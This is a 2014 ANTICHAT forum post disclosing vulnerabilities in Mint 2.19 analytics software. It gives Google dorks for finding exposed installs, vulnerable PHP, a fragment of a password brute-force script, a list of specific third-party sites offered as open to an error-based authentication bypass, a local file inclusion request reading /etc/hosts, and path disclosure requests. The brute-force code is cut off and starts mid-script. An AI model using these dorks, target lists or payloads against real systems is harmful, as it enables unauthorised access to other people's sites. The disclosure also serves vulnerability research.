Mint 2.19 — ANTICHAT Forum

20.04.2014, 19:23

Unknown

Guest

Сообщений: n/a

Провел на форуме:
8705

Репутация: 81

************************************************** ****************************

# App Name: Mint 2.19

# Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "

# Vendor Homepage: www.haveamint.com

************************************************** ****************************/

1. Email verification bypass($_COOKIE and $_GET):

Vulnerable Code(mint.php):

Код:

Code:
function isLoggedIn() 
	{
		return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false; 
	}

POC:

Код:

Code:
>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
						exit();
					}
				}		
				fclose($file);
				echo ">>>>>bruteforce UNsuccessful :(\n";
			} else echo "ERROR: ".$passlist." not found!\n";
			break;	
		default:
			echo "##### Mint 2.19 email verification bypass\n";
			echo "##### Author: Unlog\n";
			echo "##### Usage:\n".
					"\tmint.php -check www.example.com /mint/\n".
					"\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
	}
?>

Additional Information:

Same vulnerability in authenticateRSS function

Vulnerable Code(mint.php):

Код:

Code:
function authenticateRSS() 
	{
		return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
	}

POC: Same as above(with some modifications)

2. _Fatal error_ authentification bupass:

Info:

If there is some fatal error like _mysql server down_, no authentification is needed to access preferences

Vulnerable Code(path.php):

Код:

Code:
if ($Mint->errors['fatal'])
{
	include(MINT_ROOT.'app/paths/errors/index.php');
	exit();
}

Google Dork: "Mint was unable to connect" intitle:"Mint:"

POC:

Код:

Code:
http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences

3. LFI in mint.php

Info:

LFI Requies access to preferences(can be obtained by using first or second exploit)

Vulnerable Code:

Код:

Code:
mint.php:
 	function installPepper($pathToPepper)
	{
		include_once(MINT_ROOT.$pathToPepper);
		...
		
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
	switch($_POST['action'])
	...
		case 'Install Pepper':
			$Mint->tmp['pageTitle'] = 'Install Pepper';
			$Mint->installPepper($_POST['src']);

POC:

Код:

Code:
POST http://***/ HTTP/1.0
Host: ***.com
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58

MintPath=Preferences&action=Install Pepper&src=/etc/hosts&

4. Multiple Full Path Disclosure

Vulnerable Code:

Код:

Code:
if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file

POC:

Код:

Code:
GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
and etc

ANTICHAT — форум по информационной безопасности, OSINT и технологиям